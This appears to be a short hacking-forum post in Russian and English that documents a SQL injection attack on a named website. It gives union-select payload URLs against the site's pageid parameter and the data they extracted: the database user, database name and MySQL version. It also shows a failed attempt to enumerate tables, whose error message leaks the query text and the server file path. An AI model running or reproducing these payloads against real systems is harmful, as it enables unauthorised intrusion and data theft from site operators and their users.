http://hutro.com/index.php?pageid=15+union+select+1,2,concat_ws(0x3 a,user(),database(),version()),4,5,6,7,8,9,10,11,1 2--
hutro_hutro@localhost:hutro_hutro:4.1.22-standard-log
http://hutro.com/index.php?pageid=15+union+select+1,2,table_name,4, 5,6,7,8,9,10,11,12+from+information_schema.tables+ limit+0,1--
выдает:
Код:
SELECT * FROM aadm_menu WHERE id=15 union select 1,2,table_name,4,5,6,7,8,9,10,11,12 from information_schema.tables limit 0,1--: SELECT command denied to user 'hutro_hutro'@'localhost' for table 'tables'
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/hutro/public_html/index.php on line 86
